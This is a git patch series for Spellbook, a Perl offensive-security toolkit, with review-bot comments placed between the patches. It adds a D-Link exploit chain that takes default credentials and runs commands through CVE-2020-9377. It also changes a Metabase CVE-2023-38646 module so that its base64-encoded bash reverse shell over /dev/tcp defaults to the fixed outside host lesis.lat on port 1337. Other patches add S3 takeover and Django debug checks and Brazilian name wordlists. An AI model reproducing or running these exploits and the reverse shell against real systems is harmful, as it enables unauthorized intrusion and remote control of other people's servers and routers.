From 44549721d54fc22fa54b71b99bbc7f9ab21c1fcf Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Sun, 16 Jun 2024 12:17:17 -0300 Subject: [PATCH 01/17] remove duplicate module --- .config/modules.json | 6 ------ 1 file changed, 6 deletions(-) diff --git a/.config/modules.json b/.config/modules.json index 50f117f..041fc7c 100644 --- a/.config/modules.json +++ b/.config/modules.json @@ -377,12 +377,6 @@ "category": "advisory", "module": "CVE_2024_4577", "description": "PHP CGI Argument Injection vulnerability" - }, - { - "id": "0063", - "category": "advisory", - "module": "CVE_2021_41174", - "description": "Grafana Reflected XSS" } ] } \ No newline at end of file From e3dad4d1d12ba730fe1338c41ad82b149c92d067 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Sun, 16 Jun 2024 12:18:47 -0300 Subject: [PATCH 02/17] new module --- cpanfile | 1 + 1 file changed, 1 insertion(+) diff --git a/cpanfile b/cpanfile index b5d292b..660c142 100644 --- a/cpanfile +++ b/cpanfile @@ -7,3 +7,4 @@ requires "Net::DNS", "1.34"; requires "WWW::Mechanize", "2.11"; requires "Net::IP"; requires "UUID::Tiny", "1.04"; +requires "WWW::Mechanize"; \ No newline at end of file From 3e654b029f5a20d8648866db5ac17d12087b27c2 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Sun, 16 Jun 2024 12:19:18 -0300 Subject: [PATCH 03/17] fixes and more flexibility --- lib/Spellbook/Exploit/Fullchain_DLINK.pm | 81 ++++++++++++------------ 1 file changed, 39 insertions(+), 42 deletions(-) diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm index e6cf014..e7d8540 100644 --- a/lib/Spellbook/Exploit/Fullchain_DLINK.pm +++ b/lib/Spellbook/Exploit/Fullchain_DLINK.pm 
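Review bot: The added `requires "WWW::Mechanize";` in the cpanfile hunk duplicates the requirement two lines above it, `requires "WWW::Mechanize", "2.11";`, and drops the minimum version. The commit subject says "new module", so a different distribution was presumably intended; as written the line adds nothing to the dependency set. Either remove it or replace it with the dependency that was meant, pinned to a minimum version like its neighbours, and end the file with a newline.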
@@ -4,66 +4,62 @@ package Spellbook::Exploit::Fullchain_DLINK { use HTTP::Request; use HTTP::Headers; use LWP::UserAgent; - use Spellbook::Recon::Shodan; + use Spellbook::Recon::Query_Shodan; use Spellbook::Advisory::CVE_2020_9376; use Spellbook::Advisory::CVE_2020_9377; sub new { my ($self, $parameters) = @_; - my ($help, $target, @results); + my ($help, $target, $payload, @results); Getopt::Long::GetOptionsFromArray ( $parameters, - "h|help" => \$help, - "t|target=s" => \$target + "h|help" => \$help, + "t|target=s" => \$target, + "p|payload=s" => \$payload ); if ($target) { - my @targets = Spellbook::Recon::Shodan -> new (["--target" => 1]); - - foreach my $router (@targets) { - my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $router]); + if ($target !~ /^http(s)?:\/\//x) { + $target = "http://$target"; + } - if ($credentials) { - my ($username, $password) = split /:/, $credentials; + my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]); - if (!$password) { $password = "admin"; } + if ($credentials) { + my ($username, $password) = split /:/, $credentials; - if ($username) { - if ($router !~ /^http(s)?:\/\//x) { - $router = "http://$router"; - } + if (!$password) { + $password = "admin"; + } - my $userAgent = LWP::UserAgent->new(); - my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; + if ($username) { + my $userAgent = LWP::UserAgent->new(); + my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; - my $headers = HTTP::Headers->new ( - "Content-Type" => "application/x-www-form-urlencoded", - "Cookie" => "uid=dLktm5OJdn", - "User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0", - "Accept" => "*/*", - "Accept-Language" => "en-US,en;q=0.5", - "Accept-Encoding" => "gzip, deflate", - "Origin" => "$router", - "Referer" => "$router/", - "Connection" => "keep-alive" - ); + 
my $headers = HTTP::Headers->new ( + "Content-Type" => "application/x-www-form-urlencoded", + "Cookie" => "uid=zwUEueUOvi", + "User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0", "Accept" => "*/*", + "Accept-Language" => "en-US,en;q=0.5", + "Accept-Encoding" => "gzip, deflate", + "Origin" => $target, + "Referer" => $target, + "Connection" => "keep-alive" + ); - my $request = HTTP::Request -> new("POST", "$router/session.cgi", $headers, $payload); - my $response = $userAgent -> request($request); + my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload); + my $response = $userAgent -> request($request); - if ($response -> is_success) { - my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ - "--target" => $router, - "--cookie" => "dLktm5OJdn", - "--payload" => "ping h4mm16zegmqhsuhuatu0j6ged5jw7nvc.oastify.com" - ]); + if ($response -> is_success) { + my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ + "--target" => $target, + "--cookie" => "zwUEueUOvi", + "--payload" => "uname -a" + ]); - if ($exploit[0] ne "Authenication fail") { - print "$router => $username / $password / dLktm5OJdn\n"; - - push @results, @exploit; - } + if ($exploit[0] ne "Authenication fail") { + push @results, @exploit; } } } @@ -77,7 +73,8 @@ package Spellbook::Exploit::Fullchain_DLINK { \rExploit::Fullchain_DLINK \r======================= \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + \r-t, --target Define a target + \r-p, --payload Send a command\n\n"; } return 0; From c07f2650e22da9d859cd7dbd8e929003c8ff55f9 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Wed, 19 Jun 2024 12:52:21 -0300 Subject: [PATCH 04/17] change name of the module --- .config/modules.json | 2 +- cpanfile | 3 +- lib/Spellbook/Recon/Technologies.pm | 50 ----------------------------- 3 files changed, 3 insertions(+), 52 deletions(-) delete mode 100644 lib/Spellbook/Recon/Technologies.pm 
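Review bot: The new `-p|--payload` option in `new` is parsed into `$payload` but never used: the inner `my $payload = "REPORT_METHOD=xml&..."` shadows it for the login body, and the value handed to CVE_2020_9377 is a literal string. The help hunk at the end of this file now documents `-p, --payload Send a command`, so the usage text describes behaviour the module does not have. Either drop the option and its help line, or at least rename the inner variable (for example `my $login_body = ...`) so the two meanings cannot be confused. The session cookie value is also written out twice as a literal, once in the `Cookie` header and once in `--cookie`; a single variable would keep the two from drifting apart.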
diff --git a/.config/modules.json b/.config/modules.json index 041fc7c..225e9f8 100644 --- a/.config/modules.json +++ b/.config/modules.json @@ -285,7 +285,7 @@ { "id": "0048", "category": "recon", - "module": "Technologies", + "module": "Detect_Tech", "description": "Detect the stack of a web application" }, { diff --git a/cpanfile b/cpanfile index 660c142..2ac4f89 100644 --- a/cpanfile +++ b/cpanfile @@ -7,4 +7,5 @@ requires "Net::DNS", "1.34"; requires "WWW::Mechanize", "2.11"; requires "Net::IP"; requires "UUID::Tiny", "1.04"; -requires "WWW::Mechanize"; \ No newline at end of file +requires "WWW::Mechanize"; +requires "WWW::Wappalyzer"; \ No newline at end of file diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm deleted file mode 100644 index 578ca76..0000000 --- a/lib/Spellbook/Recon/Technologies.pm +++ /dev/null @@ -1,50 +0,0 @@ -package Spellbook::Recon::Technologies { - use strict; - use warnings; - use WWW::Wappalyzer; - use Spellbook::Core::UserAgent; - use List::Util 'pairmap'; - - sub new { - my ($self, $parameters) = @_; - my ($target, $help, @result); - - Getopt::Long::GetOptionsFromArray ( - $parameters, - "h|help" => \$help, - "t|target=s" => \$target, - ); - - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; - } - - my $userAgent = Spellbook::Core::UserAgent -> new(); - my $request = $userAgent -> get($target); - my %headers_hash = pairmap { $a => [ $request -> headers -> header($a) ] } $request -> headers -> flatten; - my $wappalyzer = WWW::Wappalyzer -> new(); - - my %detected = $wappalyzer -> detect ( - html => $request -> decoded_content, - headers => \%headers_hash - ); - - @result = map { @$_ } values %detected; - - return @result; - } - - if ($help) { - return " - \rRecon::Detect_Tech - \r===================== - \r-t, --target Define the target - \r-h, --help See this menu\n\n"; - } - - return 1; - } -} - -1; \ No newline at end of file 
From e72e36d5d5ee515dca9095ae60c228a3b14dcc0c Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 11 Oct 2024 10:42:59 +0100 Subject: [PATCH 05/17] notes --- lib/Spellbook/Android/notes.txt | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 lib/Spellbook/Android/notes.txt diff --git a/lib/Spellbook/Android/notes.txt b/lib/Spellbook/Android/notes.txt new file mode 100644 index 0000000..50c0124 --- /dev/null +++ b/lib/Spellbook/Android/notes.txt @@ -0,0 +1,18 @@ +read the source code searching for insecure connections, like HTTP, WS, FTP, SMTP; +Search for private keys (criptography or simple secrets); + SECRET_KEY +LFI/ Private file access +Unprotected activities +Unprotected services +Intent redirection +Incorrect URL verification +Cross-app scripting +Deep link + - CSRF + - Open redirection + - XSS + - LFIs + +AndroidManifest.xml +- resources.arsc/strings.xml +- res/xml/file_paths.xml \ No newline at end of file From a4a96ff0ef7026da86baafa27ab9315ec357cab2 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Thu, 24 Oct 2024 20:45:30 +0100 Subject: [PATCH 06/17] add a new pattern to detect more cases --- lib/Spellbook/Exploit/S3_Bucket_Takeover.pm | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm index f377321..2a353b1 100644 --- a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm +++ b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm 
@@ -15,13 +15,16 @@ package Spellbook::Exploit::S3_Bucket_Takeover { if ($target) { if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; + $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get($target); - if ($request -> code() == 404 && $request-> content() =~ m/Code: NoSuchBucket/x) { + if ( + ($request -> code() == 404) && + (($request-> content() =~ m/Code: NoSuchBucket/x) || ($request-> content() =~ m/NoSuchBucket<\/Code>/x)) + ) { push @result, $target; } From 1d3c6a93facda8a0b4b912e5b2414177e29fdbb3 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Thu, 24 Oct 2024 21:34:39 +0100 Subject: [PATCH 07/17] draft module --- lib/Spellbook/Recon/Technologies.pm | 50 +++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 lib/Spellbook/Recon/Technologies.pm diff --git a/lib/Spellbook/Recon/Technologies.pm b/lib/Spellbook/Recon/Technologies.pm new file mode 100644 index 0000000..0801727 --- /dev/null +++ b/lib/Spellbook/Recon/Technologies.pm 
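Review bot: The first alternative in the rewritten condition, `m/Code: NoSuchBucket/x`, cannot match text that contains the space, because under `/x` unescaped whitespace in the pattern is ignored and the pattern is effectively `Code:NoSuchBucket`. Drop the `/x` flag or escape the space (`m/Code:\ NoSuchBucket/x`), and read `$request -> content()` once into a variable instead of calling it twice. This hunk also changes the default scheme from `https://` to `http://`, which the commit message does not mention; if it is intentional a short comment saying why would help, since the check then runs over cleartext by default. The enclosing `new` starts and ends outside the hunk.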
@@ -0,0 +1,50 @@
+package Spellbook::Recon::Technologies {
+ use strict;
+ use warnings;
+ use WWW::Wappalyzer;
+ use Spellbook::Core::UserAgent;
+ use List::Util 'pairmap';
+
+ sub new {
+ my ($self, $parameters) = @_;
+ my ($target, $help, @result);
+
+ Getopt::Long::GetOptionsFromArray (
+ $parameters,
+ "h|help" => \$help,
+ "t|target=s" => \$target,
+ );
+
+ if ($target) {
+ if ($target !~ /^http(s)?:\/\//x) {
+ $target = "https://$target";
+ }
+
+ my $userAgent = Spellbook::Core::UserAgent -> new();
+ my $request = $userAgent -> get($target);
+ my %headers_hash = pairmap { $a => [ $request -> headers -> header($a) ] } $request -> headers -> flatten;
+ my $wappalyzer = WWW::Wappalyzer -> new();
+
+ my %detected = $wappalyzer -> detect (
+ html => $request -> decoded_content,
+ headers => \%headers_hash
+ );
+
+ @result = map { @$_ } values %detected;
+
+ return @result;
+ }
+
+ if ($help) {
+ return "
+ \rRecon::Detect_Tech
+ \r=====================
+ \r-t, --target Define the target
+ \r-h, --help See this menu\n\n";
+ }
+
+ return 1;
+ }
+}
+
+1;
From ba9d3e7cbe51c510eb78c8d3758c5480b538df75 Mon Sep 17 00:00:00 2001
From: Katashi
Date: Fri, 25 Oct 2024 09:14:35 -0300
Subject: [PATCH 08/17] Add the new Django_DEBUG.pm file (#78)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* Sync (#67) * new module to identify technologies from a web page * added https string * added trigger based on pull request * Add the new Django_DEBUG.pm file --------- Co-authored-by: Heitor Gouvêa
---
lib/Spellbook/Exploit/Django_DEBUG.pm | 61 +++++++++++++++++++++++++++
1 file changed, 61 insertions(+)
create mode 100755 lib/Spellbook/Exploit/Django_DEBUG.pm
diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm
new file mode 100755
index 0000000..38d9040
--- /dev/null
+++ b/lib/Spellbook/Exploit/Django_DEBUG.pm
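Review bot: `new` in the added Technologies.pm calls `Getopt::Long::GetOptionsFromArray`, but the module's `use` lines do not load `Getopt::Long`, so it works only if a caller has loaded it first; add `use Getopt::Long;` next to the other imports. The help text is headed `Recon::Detect_Tech` while the package is `Spellbook::Recon::Technologies`, which looks like a leftover from the earlier rename. The fetch result is passed to `detect` without any success check, so a failed request is fingerprinted as if it were a page, and the fall-through `return 1;` differs from the `return 0;` used by the other modules in this series.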
@@ -0,0 +1,61 @@
+package Spellbook::Exploit::Django_DEBUG {
+ use strict;
+ use warnings;
+ use Spellbook::Core::UserAgent;
+
+ sub new {
+ my ($self, $parameters) = @_;
+ my ($help, $target, @results);
+
+ Getopt::Long::GetOptionsFromArray (
+ $parameters,
+ "h|help" => \$help,
+ "t|target=s" => \$target
+ );
+
+ if ($target){
+ if ($target !~ /^http(s)?:\/\//){
+ $target = "https://$target";
+ }
+
+ my $data = "foo=bar&instriq=io";
+
+ my $useragent = Spellbook::Core::UserAgent -> new ();
+ my @payloads = (
+ "/instriqwashere",
+ "/api/instriqwashere",
+ "/api/v1/instriqwashere",
+ "/admin/instriqwashere",
+ "/admin/1"
+ );
+
+ foreach my $payload (@payloads) {
+ my $response = $useragent -> get($target . $payload);
+
+ if ($response =~ /RuntimeError/) {
+ push @results, "$target has \"debug mode\" enabled! - [Method: GET]";
+ }
+
+ my $response_post = $useragent -> post($target . $payload, Content => $data);
+
+ if ($response_post =~ /RuntimeError/) {
+ push @results, "$target has \"debug mode\" enabled! - [Method: POST]";
+ }
+ }
+
+ return @results
+ }
+
+ if ($help) {
+ return ("
+ \rExploit::Django_DEBUG
+ \r=======================
+ \r-h, --help See this menu
+ \r-t, --target Define a target");
+ }
+
+ return 0;
+ }
+}
+
+1;
\ No newline at end of file
From be1fa74084c7765505a04cb5e1de4c05922b221a Mon Sep 17 00:00:00 2001
From: htrgouvea
Date: Fri, 25 Oct 2024 13:33:12 +0100
Subject: [PATCH 09/17] update version
---
README.md | 2 +-
lib/Spellbook/Core/Helper.pm | 2 +-
lib/Spellbook/Core/UserAgent.pm | 2 +-
3 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 08ded07..b9fd882 100755
--- a/README.md
+++ b/README.md
@@ -7,7 +7,7 @@ - +
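Review bot: Both checks in the `foreach` loop of the added Django_DEBUG.pm, `$response =~ /RuntimeError/` and `$response_post =~ /RuntimeError/`, match against the response object itself rather than its body. If `Spellbook::Core::UserAgent` returns LWP response objects, as the `-> get` and `-> post` calls suggest, the object stringifies to something like `HTTP::Response=HASH(...)` and the test never succeeds; use `$response -> decoded_content =~ /RuntimeError/`. The later "fix code style" commit in this series keeps the same comparison. The bare word `RuntimeError` is a weak signal for debug mode, so expect false positives from any page that prints that string, and each reported hit omits the path that matched. `Getopt::Long` is called here without being loaded by the module's own `use` lines.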
diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index d714970..a868698 100644 --- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -4,7 +4,7 @@ package Spellbook::Core::Helper { sub new { print " - \rSpellbook v0.3.4 + \rSpellbook v0.3.5 \rCore Commands \r============== \r\tCommand Description diff --git a/lib/Spellbook/Core/UserAgent.pm b/lib/Spellbook/Core/UserAgent.pm index 6111815..af21bc3 100644 --- a/lib/Spellbook/Core/UserAgent.pm +++ b/lib/Spellbook/Core/UserAgent.pm @@ -10,7 +10,7 @@ package Spellbook::Core::UserAgent { verify_hostname => 0, SSL_verify_mode => 0 }, - agent => "Spellbook / v0.3.4" + agent => "Spellbook / v0.3.5" ); $userAgent -> default_headers -> push_header("Cache-Control" => "no-cache"); From efa84374444fcde030877bdea8182231292ffd7f Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 14:01:14 +0100 Subject: [PATCH 10/17] fix code style and improve some parts --- .config/modules.json | 6 ++++ lib/Spellbook/Exploit/Django_DEBUG.pm | 40 ++++++++++----------------- 2 files changed, 21 insertions(+), 25 deletions(-) diff --git a/.config/modules.json b/.config/modules.json index 225e9f8..01222d4 100644 --- a/.config/modules.json +++ b/.config/modules.json @@ -377,6 +377,12 @@ "category": "advisory", "module": "CVE_2024_4577", "description": "PHP CGI Argument Injection vulnerability" + }, + { + "id": "0063", + "category": "exploit", + "module": "Django_Debug", + "description": "Detect if a Django application has the debug mode enabled" } ] } \ No newline at end of file diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm index 38d9040..2949057 100755 --- a/lib/Spellbook/Exploit/Django_DEBUG.pm +++ b/lib/Spellbook/Exploit/Django_DEBUG.pm 
@@ -1,7 +1,8 @@ -package Spellbook::Exploit::Django_DEBUG { +package Spellbook::Exploit::Django_Debug { use strict; use warnings; use Spellbook::Core::UserAgent; + use Spellbook::Helper::Generate_UUID; sub new { my ($self, $parameters) = @_; @@ -15,31 +16,20 @@ package Spellbook::Exploit::Django_DEBUG { if ($target){ if ($target !~ /^http(s)?:\/\//){ - $target = "https://$target"; + $target = "https://$target"; } - my $data = "foo=bar&instriq=io"; + my $useragent = Spellbook::Core::UserAgent -> new(); + my @paths = ("/genericpath", "/api/spellbook", "/api/v1/spellbook", "/admin/spellbook", "/admin/1"); + my @method = ("get", "post"); - my $useragent = Spellbook::Core::UserAgent -> new (); - my @payloads = ( - "/instriqwashere", - "/api/instriqwashere", - "/api/v1/instriqwashere", - "/admin/instriqwashere", - "/admin/1" - ); + foreach my $payload (@paths) { + foreach my $method (@method) { + my $response = $useragent -> $method ($target . $payload); - foreach my $payload (@payloads) { - my $response = $useragent -> get($target . $payload); - - if ($response =~ /RuntimeError/) { - push @results, "$target has \"debug mode\" enabled! - [Method: GET]"; - } - - my $response_post = $useragent -> post($target . $payload, Content => $data); - - if ($response_post =~ /RuntimeError/) { - push @results, "$target has \"debug mode\" enabled! - [Method: POST]"; + if ($response =~ /RuntimeError/) { + push @results, "$target has \"debug mode\" enabled! - [Method: $method]"; + } } } @@ -47,11 +37,11 @@ package Spellbook::Exploit::Django_DEBUG { } if ($help) { - return (" - \rExploit::Django_DEBUG + return " + \rExploit::Django_Debug \r======================= \r-h, --help See this menu - \r-t, --target Define a target"); + \r-t, --target Define a target"; } return 0; From 7b4fb8f5a8b2cef64203b87b4ef5cf44159bb957 Mon Sep 17 00:00:00 2001 
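Review bot: The package is renamed to `Spellbook::Exploit::Django_Debug` in the first hunk, but the diff header and diffstat show the file staying at `lib/Spellbook/Exploit/Django_DEBUG.pm`, so on a case-sensitive filesystem a `require` of the new package name will presumably not find it. Rename the file in the same commit; the `.config/modules.json` entry added here already uses `Django_Debug`. `use Spellbook::Helper::Generate_UUID;` is added but nothing in the visible hunks calls it, and `@method` would read better as `@methods` next to the loop variable `$method`. The POST request no longer sends a body, which the commit message does not call out.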
From: htrgouvea Date: Fri, 25 Oct 2024 14:07:34 +0100 Subject: [PATCH 11/17] fix reverse shell payload --- lib/Spellbook/Advisory/CVE_2023_38646.pm | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm index 827cb27..2660ce3 100644 --- a/lib/Spellbook/Advisory/CVE_2023_38646.pm +++ b/lib/Spellbook/Advisory/CVE_2023_38646.pm @@ -9,7 +9,10 @@ package Spellbook::Advisory::CVE_2023_38646 { sub new { my ($self, $parameters) = @_; - my ($help, $target, $remote, $port, @result); + my ($help, $target, @result); + + my $remote = 'lesis.lat'; + my $port = 1337; Getopt::Long::GetOptionsFromArray ( $parameters, @@ -34,7 +37,7 @@ package Spellbook::Advisory::CVE_2023_38646 { if ($token) { my $headers = HTTP::Headers -> new ("Content-Type" => "application/json"); - my $reverse = encode_base64("bash -i >&/dev/tcp/$remote/$port 0>&1", ""); + my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", ""); my $payload = qq({ "token": "$token", @@ -60,7 +63,7 @@ package Spellbook::Advisory::CVE_2023_38646 { my $response = $userAgent -> request($request); if ($response -> code() == 400) { - push @result, $target; + push @result, "\n[+] $target exploited\n"; } } } From 41bd7471f370835fb7c73806f918bf10021274c4 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 14:13:55 +0100 Subject: [PATCH 12/17] new wordlists --- files/top100-brazilian-lastnames.txt | 100 +++++++++++++ files/top210-brazilian-names.txt | 210 +++++++++++++++++++++++++++ 2 files changed, 310 insertions(+) create mode 100644 files/top100-brazilian-lastnames.txt create mode 100644 files/top210-brazilian-names.txt diff --git a/files/top100-brazilian-lastnames.txt b/files/top100-brazilian-lastnames.txt new file mode 100644 index 0000000..a36a262 --- /dev/null +++ b/files/top100-brazilian-lastnames.txt 
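Review bot: The first hunk replaces the previously undefined `$remote` and `$port` with hard-coded defaults, `my $remote = 'lesis.lat';` and `my $port = 1337;`, so a run that omits those values points the connection at a fixed third-party host. A default like this is easy to trigger by accident during an authorised test and sends traffic somewhere neither the operator nor the system owner chose. Leave both variables undefined and return the help text when either is missing, assuming the option list outside this hunk still accepts them. The enclosing `new` continues outside the hunk.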
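Review bot: The third hunk changes the returned element from `$target` to the decorated string `"\n[+] $target exploited\n"`, which makes the result unusable as input to other modules and inconsistent with modules in this series that push the bare target. The message also asserts success on the strength of `$response -> code() == 400` alone, so the wording is stronger than what the check establishes. Keep pushing `$target` and leave presentation to the caller, or at minimum word the message as a possible finding.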
@@ -0,0 +1,100 @@ +silva +santos +oliveira +souza +lima +almeida +costa +pereira +rodrigues +ferreira +carvalho +gomes +ribeiro +martins +alves +rocha +dias +martins +almeida +mendes +pires +barros +ferreira +nascimento +correia +teixeira +mendes +lima +cardoso +andrade +ferreira +monteiro +ribeiro +martins +nunes +castro +azevedo +mendes +santos +barreto +vieira +tavares +matos +frança +figueiredo +maia +paiva +brito +rios +araújo +santos +cunha +queiroz +neves +lemos +gomes +ribeiro +teles +lima +silva +barros +martins +moura +rocha +almeida +oliveira +costa +dias +lopes +pacheco +salgado +martins +rocha +oliveira +lima +campos +araújo +cunha +teixeira +almeida +leite +ribeiro +lopes +macedo +moreira +pinto +lima +pires +queiroz +santos +brito +oliveira +cardoso +andrade +martins +soares +nascimento +cordeiro +faria +nascimento \ No newline at end of file diff --git a/files/top210-brazilian-names.txt b/files/top210-brazilian-names.txt new file mode 100644 index 0000000..3a4d871 --- /dev/null +++ b/files/top210-brazilian-names.txt 
@@ -0,0 +1,210 @@ +adriana +adriano +alan +alana +alanys +alessandra +alessandro +alice +aline +amanda +amaro +ana +ana beatriz +ana clara +anderson +andre +andrea +angela +antonia +arthur +beatriz +betania +beto +bianca +brenda +bruna +bruno +caio +camila +carla +carlos +carol +caroline +cecilia +cintia +clara +claudia +claudio +cleber +cleusa +cora +cristiano +daiane +daniel +daniela +daniele +daniella +danilo +davi +debora +denise +diego +douglas +edson +elaine +elena +eliane +elias +elisa +eloisa +emilly +emily +erika +evandro +evelyn +fabiana +fabio +fagner +felipe +fernanda +fernando +flavia +flavio +francisco +gabriel +gabriele +giovanna +giovanni +giselle +guilherme +gustavo +heitor +helena +igor +isabella +ivan +ivete +jaime +jamil +janaina +janderson +jaqueline +jessica +joana +joao +joão pedro +joel +joelma +jorge +jose +julia +julian +juliana +juliane +juliano +julio +junior +karla +katia +kelly +lais +lara +larissa +laura +leandro +leila +leticia +liana +luan +luana +lucas +luciana +luis +luiz +maiara +maicon +maira +marcelo +marcia +marcio +marcos +maria +mariana +mariane +matheus +mauricio +michelle +mikael +miranda +miriam +murilo +nadja +nascimento +nátaly +natasha +nathalia +nicolas +nicoly +nilson +orlando +otavio +patricia +paula +paulo +pedro +priscila +rafael +rafaela +raquel +raul +regina +renan +renata +renato +ricardo +rita +roberta +roberto +robson +rodolfo +rodrigo +ronaldo +roni +rony +rosaline +ruan +ruy +sabrina +samanta +samara +sandro +sergio +sheila +simone +sofia +sonia +tainara +tais +talita +tamires +tânia +tatiane +thais +thiago +thierry +tiago +tomas +valentina +valeria +vanessa +vera +veronica +victor +victoria +vinicius +vivian +viviane +wellington +willian +heverton \ No newline at end of file From 6af14b764aa8adac1408d7073125bec7393c09d3 Mon Sep 17 00:00:00 2001 
From: htrgouvea Date: Fri, 25 Oct 2024 14:54:39 +0100 Subject: [PATCH 13/17] update version --- README.md | 4 ++-- lib/Spellbook/Core/Helper.pm | 2 +- lib/Spellbook/Core/UserAgent.pm | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index b9fd882..f123b5e 100755 --- a/README.md +++ b/README.md @@ -7,7 +7,7 @@ - +
@@ -44,7 +44,7 @@ $ cpanm --installdeps . ### How to use ``` -Spellbook v0.3.3 +Spellbook v0.3.6 Core Commands ============== Command Description diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index a868698..f50f568 100644 --- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -4,7 +4,7 @@ package Spellbook::Core::Helper { sub new { print " - \rSpellbook v0.3.5 + \rSpellbook v0.3.6 \rCore Commands \r============== \r\tCommand Description diff --git a/lib/Spellbook/Core/UserAgent.pm b/lib/Spellbook/Core/UserAgent.pm index af21bc3..d4548d7 100644 --- a/lib/Spellbook/Core/UserAgent.pm +++ b/lib/Spellbook/Core/UserAgent.pm @@ -10,7 +10,7 @@ package Spellbook::Core::UserAgent { verify_hostname => 0, SSL_verify_mode => 0 }, - agent => "Spellbook / v0.3.5" + agent => "Spellbook / v0.3.6" ); $userAgent -> default_headers -> push_header("Cache-Control" => "no-cache"); From 9fe48d11bd713949efb8ec157a216b07f67db2b5 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 14:55:15 +0100 Subject: [PATCH 14/17] change email --- SECURITY.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/SECURITY.md b/SECURITY.md index 33340dd..d1758e0 100755 --- a/SECURITY.md +++ b/SECURITY.md 
@@ -1,6 +1,6 @@ # Security Policy -If you find a security issue, please DO NOT submit it via the issue tracker! Instead, please follow responsible disclosure practices and send information about security issues directly to [hi@heitorgouvea.me](mailto:hi@heitorgouvea.me) so that a proper assessment can be made and a fix prepared before a wide announcement. You will receive an acknowledgement within 24 hours. +If you find a security issue, please DO NOT submit it via the issue tracker! Instead, please follow responsible disclosure practices and send information about security issues directly to [security@heitorgouvea.me](mailto:security@heitorgouvea.me) so that a proper assessment can be made and a fix prepared before a wide announcement. You will receive an acknowledgement within 24 hours. Even in cases where you have limited or incomplete information, or you're not sure whether or not a problem constitutes a security issue, please make contact as soon as possible. We can work together to investigate, debug, and assess. From 5c63cf25475643dc177926a22a91b94c412e3dd4 Mon Sep 17 00:00:00 2001 From: htrgouvea Date: Fri, 25 Oct 2024 16:02:13 +0100 Subject: [PATCH 15/17] rename module --- .config/modules.json | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/.config/modules.json b/.config/modules.json index 01222d4..cfae08e 100644 --- a/.config/modules.json +++ b/.config/modules.json @@ -383,6 +383,12 @@ "category": "exploit", "module": "Django_Debug", "description": "Detect if a Django application has the debug mode enabled" + }, + { + "id": "0064", + "category": "recon", + "module": "Technologies", + "description": "Use wappalyzer to detect technologies from a website" } ] } \ No newline at end of file From dcac3a4215c1b538cf36f4ac50ee416ed2728569 Mon Sep 17 00:00:00 2001 
